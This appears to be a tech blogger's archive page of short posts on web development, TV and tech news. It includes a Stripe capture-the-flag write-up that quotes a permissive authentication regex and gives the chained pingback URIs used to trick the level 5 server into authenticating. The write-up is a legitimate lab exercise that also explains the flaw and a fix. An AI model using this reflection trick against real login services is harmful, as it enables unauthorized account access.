“Jon Hamm And Adam Scott’s ‘greatest Event In Tv
History’ Was A Tribute To A Forgotten ’80s Classic
If you know more about Simon and Simon than its intro and general premise, you’re better at TV than I am. If you’ve never heard of Simon and Simon, you’re the BEST at TV because, honestly, Simon
& Simon — a CBS series about two mismatched brothers who ran a private detective service; it ran for eight seasons — wasn’t good.
Source: Uproxx”
Level 5 of the Stripe CTF revolved around a design issue in an OpenID like protocol.
def authenticated?(body)
body =~ /[^\w]AUTHENTICATED[^\w]*$/
end
...
if authenticated?(body)
session[:auth_user] = username
session[:auth_host] = host
return "Remote server responded with: #{body}." \
" Authenticated as #{username}@#{host}!"
This level is an implementation of a federated identity protocol. You give it an endpoint URI and a username and password, it posts the username and password to the endpoint URI, and if the response is 'AUTHENTICATED' then access is allowed. It is easy to be authenticated on a server you control, but this level requires you to authenticate from the server running the level. This level only talks to stripe CTF servers so the first step is to upload a document to the level 2 server containing the text 'AUTHENTICATED' and we can now authenticate on a level 2 server. Notice that the level 5 server will dump out the content of the endpoint URI and that the regexp it uses to detect the text 'AUTHENTICATED' can match on that dump. Accordingly I uploaded an authenticated file to
https://level02-2.stripe-ctf.com/user-ajvivlehdt/uploads/authenticated
Using that as my endpoint URI means authenticating as level 2. I can then choose the following endpoint
URI to authenticate as level 5.
https://level05-1.stripe-ctf.com/user-qtoyekwrod/?pingback=https%3A%2F%2Flevel02-2.stripe-ctf.com%2Fuser-ajvivlehdt%2Fuploads%2Fauthenticated&username=a&password=a
Navigating
to that URI results in the level 5 server telling me I'm authenticated as level 2 and lists the text of the level 2 file 'AUTHENTICATED'. Feeding this back into the level 5 server as my endpoint
URI means level 5 seeing 'AUTHENTICATED' coming back from a level 5 URI.
I didn't see any particular code review red flags, really the issue here is that the regular expression testing for 'AUTHENTICATED' is too permisive and the protocol itself doesn't do enough. The protocol requires only a set piece of common literal text to be returned which makes it easy for a server to accidentally fall into authenticating. Having the endpoint URI have to return variable text based on the input would make it much harder for a server to accidentally authenticate.
Stripe is running a web security capture the flag - a series of increasingly difficult web security exploit challenges. I've finished it and had a lot of fun. Working on a web browser I knew the theory of these various web based attacks, but this was my first chance to put theory into practice with:
Here's a blog post on the CTF behind the scenes setup which has many impressive features including phantom users that can be XSS/CSRF'ed.
I'll have another post on my difficulties and answers for the CTF levels after the contest is over on Wed, but if you're looking for hints, try out the CTF chatroom or the level specific CTF chatroom.
We believe Knight accidentally released the test software they used to verify that their market making software functioned properly, into NYSE’s live system.
I get chills breaking the build at work. I can’t imagine how much worse it would feel to deploy your test suite and destroy the company you work for.
Won’t someone think of the URIs?! At some point in the not too distant past, MSDN changed how you link to documentation and broke all existing links. This included some of links in documents on MSDN.
(via Feature: Google gets license to test drive autonomous cars on Nevada roads)
The coolest part of this article is that Nevada now has an autonomous vehicle license plate that’s red background and infinity on the left.
The Metro Developer Show is the first podcast exclusively for Metro developers and enthusiasts.
Each week Ryan and Travis Lowdermilk traverse the exciting world of Metro (phone, tablet, desktop and Xbox); covering the latest news and exploring what it means for the developer community and everyday users.
The goal of this experiment was to combine the flipping tables emoticons with the Threw It On The Ground video using shiny new HTML5-ish features and the end result is the table flipper flipping the Threw It On the Ground video.
The table flipper emoticon is CSS before content that changes on hover. Additionally on hover a CSS transform is applied to flip the video upside down several times and move it to the right and there's a CSS transition to animate the flipping. The only issue I ran into is that (at least on Windows) Flash doesn't like to have CSS transform rotations applied to it. So to get the most out of the flip experiment you must opt-in to HTML5 video on YouTube. And of course you must use a browser that supports the various things I just mentioned, like the latest Chrome (or not yet released IE10).
One of the more limiting issues of writing client side script in the browser is the same origin limitations of XMLHttpRequest. The latest version of all browsers support a subset of CORS to allow servers to opt-in particular resources for cross-domain access. Since IE8 there's XDomainRequest and in all other browsers (including IE10) there's XHR L2's cross-origin request features. But the vast majority of resources out on the web do not opt-in using CORS headers and so client side only web apps like a podcast player or a feed reader aren't doable.
One hack-y way around this I've found is to use YQL as a CORS proxy. YQL applies the CORS header to all its responses and among its features it allows a caller to request an arbitrary XML, HTML, or JSON resource. So my network helper script first attempts to access a URI directly using XDomainRequest if that exists and XMLHttpRequest otherwise. If that fails it then tries to use XDR or XHR to access the URI via YQL. I wrap my URIs in the following manner, where type is either "html", "xml", or "json":
yqlRequest = function(uri, method, type, onComplete, onError) {
var yqlUri = "http://query.yahooapis.com/v1/public/yql?q=" +
encodeURIComponent("SELECT * FROM " + type + ' where url="' + encodeURIComponent(uri) + '"');
if (type == "html") {
yqlUri += encodeURIComponent(" and xpath='/*'");
}
else if (type == "json") {
yqlUri += "&callback=&format=json";
}
...
This
also means I can get JSON data itself without having to go through JSONP.
FTA: “Nick Bilton put the FAA’s claims regarding Kindles and airline avionics to the test. The result? They emit less EM interference than planes are required by law to withstand.” Much less, apparently.
Cool and (relatively) new methods on the JavaScript Array object are here in the most recent versions of your favorite browser! More about them on ECMAScript5, MSDN, the IE blog, or Mozilla's documentation. Here's the list that's got me excited:
“TechCrunch and others are reporting that a program called “Carrier IQ” that comes pre-installed on Sprint phones has some pretty amazing spyware capabilities, right down to keylogging everything you do on the phone.”
From the document: ‘Appendix B. Implementation Report: The encoding defined in this document currently is used for two different HTTP header fields: “Content-Disposition”, defined in [RFC6266], and “Link”, defined in [RFC5988]. As the encoding is a profile/clarification of the one defined in [RFC2231] in 1997, many user agents already supported it for use in “Content-Disposition” when [RFC5987] got published.
Since the publication of [RFC5987], two more popular desktop user agents have added support for this encoding; see http://purl.org/
NET/http/content-disposition-tests#encoding-2231-char for details. At this time, only one major
desktop user agent (Safari) does not support it.
Note that the implementation in Internet Explorer 9 does not support the ISO-8859-1 encoding; this document revision acknowledges that UTF-8 is sufficient for expressing all code points, and removes the requirement to support ISO-8859-1.’
Yay for UTF-8!